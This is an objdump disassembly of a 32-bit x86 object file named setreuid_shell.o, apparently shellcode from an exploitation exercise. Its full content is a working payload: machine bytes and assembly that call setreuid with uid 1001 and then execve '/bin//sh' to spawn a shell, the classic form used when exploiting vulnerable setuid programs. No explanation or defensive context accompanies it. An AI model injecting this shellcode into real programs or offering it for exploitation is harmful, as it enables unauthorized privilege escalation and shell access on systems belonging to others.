
setreuid_shell.o:     file format elf32-i386


Disassembly of section .text:

00000000 <setreuid_shell>:
   0:	31 c0                	xor    %eax,%eax
   2:	b0 46                	mov    $0x46,%al
   4:	31 db                	xor    %ebx,%ebx
   6:	66 bb e9 03          	mov    $0x3e9,%bx
   a:	66 31 c9             	xor    %cx,%cx
   d:	66 b9 e9 03          	mov    $0x3e9,%cx
  11:	cd 80                	int    $0x80
  13:	31 c0                	xor    %eax,%eax
  15:	50                   	push   %eax
  16:	68 2f 2f 73 68       	push   $0x68732f2f
  1b:	68 2f 62 69 6e       	push   $0x6e69622f
  20:	89 e3                	mov    %esp,%ebx
  22:	89 c1                	mov    %eax,%ecx
  24:	89 c2                	mov    %eax,%edx
  26:	b0 0b                	mov    $0xb,%al
  28:	cd 80                	int    $0x80
